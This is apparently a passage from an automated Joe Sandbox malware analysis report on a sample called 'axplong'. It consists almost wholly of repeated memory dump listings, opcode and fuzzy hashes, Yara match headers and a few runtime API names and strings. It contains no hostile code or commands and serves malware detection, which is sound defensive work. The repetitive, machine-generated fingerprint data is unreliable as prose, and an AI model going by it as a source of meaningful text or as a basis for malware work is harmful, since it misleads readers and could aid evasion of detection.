                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                • Instruction ID: abf2d560c062e7885f9cab338b5a959992c5f36c1d463f629ed9166e144c114d
                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                • Instruction Fuzzy Hash: 665166F0E0C64E56DF3D8A3888997BE6F9EBF9D300F140C59E442D7682CA51DE48A752
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8c79f06d6a230fe63ac4eba84414d88f282312a5c8368997329064d95690f7d
                                • Instruction ID: 8bd577d86b642710cf9248c28151ca92fc1c2b8177636f001b24b3dcbd1eb80b
                                • Opcode Fuzzy Hash: b8c79f06d6a230fe63ac4eba84414d88f282312a5c8368997329064d95690f7d
                                • Instruction Fuzzy Hash: B72270B3F515144BDB0CCA5DDCA27ECB2E3AFE8214B0E813DE40AE3345EA79D9159644
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 50d7ec8c82d266f9f0f3f28b7de0794193066c6fde995bfe2c2906176b6d255f
                                • Instruction ID: 186675ce66b11b24ed8134061cf783023b4ddc7d7a5f7021da383aa018d5ceb8
                                • Opcode Fuzzy Hash: 50d7ec8c82d266f9f0f3f28b7de0794193066c6fde995bfe2c2906176b6d255f
                                • Instruction Fuzzy Hash: B4B14B71214609DFD719CF28C48ABA57FA0FF49368F258658E899CF2A1C335E992CF40
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1931ab3fa838505a363074229497c684d0736b58b632a633b31151d83af4d8ef
                                • Instruction ID: 1debf53b2a5145ac6df65511b5294ed4fd21ffd733f2d5f153b5afbde6f4bbe6
                                • Opcode Fuzzy Hash: 1931ab3fa838505a363074229497c684d0736b58b632a633b31151d83af4d8ef
                                • Instruction Fuzzy Hash: 5B51B1706087918FD319CF2DD12523ABFE1BFD9201F084A9EE4D697292D774EA44CB91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fdf5e08ab852b0b2a56e9270e0e5071e9b8fc51d86e260dd0e317cbe6e387a6c
                                • Instruction ID: 5a03bd320a62174a177d969139a29526efa55cb3301b45b0d84edb079f679eff
                                • Opcode Fuzzy Hash: fdf5e08ab852b0b2a56e9270e0e5071e9b8fc51d86e260dd0e317cbe6e387a6c
                                • Instruction Fuzzy Hash: 5321B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df403b92c24518ac194eca51f14439bdd48e078c28547bd1bb6f9af713178d64
                                • Instruction ID: 683bdc2b0fc6343a7f5471b29007232678ef935c8d9693d7d71d10a01ddf405f
                                • Opcode Fuzzy Hash: df403b92c24518ac194eca51f14439bdd48e078c28547bd1bb6f9af713178d64
                                • Instruction Fuzzy Hash: 6011A733F30C295A675C816D8C172BAA5D2EBD824070F433AD826E7284E994DE23D290
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 4d0b7b3c55794800b8b90e70c99cf788df1d22ada076aa09a2e36870bd33c98c
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: AB11087B20014147D604862DC9F86FEAF96FAC532DB3C437AD1414B758DA23A945D900
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd1dd7e332e387152e7671bf2b9b1d9b54b5accc332360c5625cc5e7e226b56c
                                • Instruction ID: 3352514a9591ab8a99bbd667d29041d4957a183cc718e3b4e5691535629f1963
                                • Opcode Fuzzy Hash: cd1dd7e332e387152e7671bf2b9b1d9b54b5accc332360c5625cc5e7e226b56c
                                • Instruction Fuzzy Hash: 30F0C297398121BD63064D547A427F62A5AE3C6334320C417F007C9996EE487A07B066
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cf45c8a8db2a398d62f740f81bc101b6d15e950d47e228358612b2ae426da80
                                • Instruction ID: 21b78900e6b52a78bb30609ffe8697b6d222185c421d06cedf139094ad5ba9e0
                                • Opcode Fuzzy Hash: 9cf45c8a8db2a398d62f740f81bc101b6d15e950d47e228358612b2ae426da80
                                • Instruction Fuzzy Hash: 91E08C70441A08BADE267F54CD49A487F6AFB41344F409418F8044B221CBA6EC82CA80
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                • Instruction ID: be8f739d45d20b4fe425fcb035b7e26766c37a4fbfc8034b7c3e5d71b7d947e8
                                • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                • Instruction Fuzzy Hash: 2CE0B672915228EBCB25DB988948D8AF7ACFB89B50F554496B501D3251C370DF00C7D1
                                APIs
                                • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0051795C
                                • __Cnd_destroy_in_situ.LIBCPMT ref: 00517968
                                • __Mtx_destroy_in_situ.LIBCPMT ref: 00517971
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                • String ID: 'kQd+V$@yQ$d+V
                                • API String ID: 4078500453-3851488442
                                • Opcode ID: 0bb1f7555eff302b05e2d3c55dae9a0f994b01d2aade898fafa1dbfa5affc93d
                                • Instruction ID: 1f3d550f871a708a64ab2a89d7edecba2710751a437fd78248f886cd4e9bc594
                                • Opcode Fuzzy Hash: 0bb1f7555eff302b05e2d3c55dae9a0f994b01d2aade898fafa1dbfa5affc93d
                                • Instruction Fuzzy Hash: 9331B7B19047059BE720DF68D845A96BFF8FF58310F100A2EF545C7241E771EA98C7A1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsrchr
                                • String ID: .bat$.cmd$.com$.exe
                                • API String ID: 1752292252-4019086052
                                • Opcode ID: e26a55568bcc32874ae009e1381d3adb05519159ee7d35ebca0973716e2ec962
                                • Instruction ID: c7f3edce726053190f9fa5e0b29be37a1f354dd2df9d9f10baa8e289a1bfdb30
                                • Opcode Fuzzy Hash: e26a55568bcc32874ae009e1381d3adb05519159ee7d35ebca0973716e2ec962
                                • Instruction Fuzzy Hash: 5001C877A0861B66662864199C1367B1F9CBBC6BB4F15002BFE44F73C1DE45DC0282A0
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mtx_unlock$Cnd_broadcast
                                • String ID:
                                • API String ID: 32384418-0
                                • Opcode ID: 7c96d2e003068e2b4f863d549432ae72a3a24b8284bdd63083ee10ad246e1606
                                • Instruction ID: 09ea6d6b78f652ba6c3589efbe0b54d3e7f35829fe9beaf909fcedcc1d4760c3
                                • Opcode Fuzzy Hash: 7c96d2e003068e2b4f863d549432ae72a3a24b8284bdd63083ee10ad246e1606
                                • Instruction Fuzzy Hash: 86A122B1A41306AFEB11DF64C949BAEBFB8FF54314F008529E815D7281EB31EA44CB91
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00502806
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 005028A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___std_exception_copy___std_exception_destroy
                                • String ID: P#P$P#P
                                • API String ID: 2970364248-2445065942
                                • Opcode ID: 2cd1ff64c82f658fccfacf6768bde323b97aef5797e5ba470636efce3efaea73
                                • Instruction ID: e9faeaacbe02793c4fd86e05bc263affc72e9042bb2c0b77c6e67c273954e9b1
                                • Opcode Fuzzy Hash: 2cd1ff64c82f658fccfacf6768bde323b97aef5797e5ba470636efce3efaea73
                                • Instruction Fuzzy Hash: 51717071E002099BDB15DFA8C885BDDFFB5FF59310F14822DE805A7282E774A984CBA5
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 00502B23
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: P#P$P#P$This function cannot be called on a default constructed task
                                • API String ID: 2659868963-81232500
                                • Opcode ID: e8693b9627cbc4338914e4f982410b22c23a0aceb9681464b52c422bddb07ea9
                                • Instruction ID: cbebaf9192ae34e490f89e089b6c543f343df0d6b8c7ccce655d8859eb064646
                                • Opcode Fuzzy Hash: e8693b9627cbc4338914e4f982410b22c23a0aceb9681464b52c422bddb07ea9
                                • Instruction Fuzzy Hash: 1FF0C270A1020CABCB10DFA8984599EBFE9EF54300F1041AEFC0597201EBB1AA88CB94
                                APIs
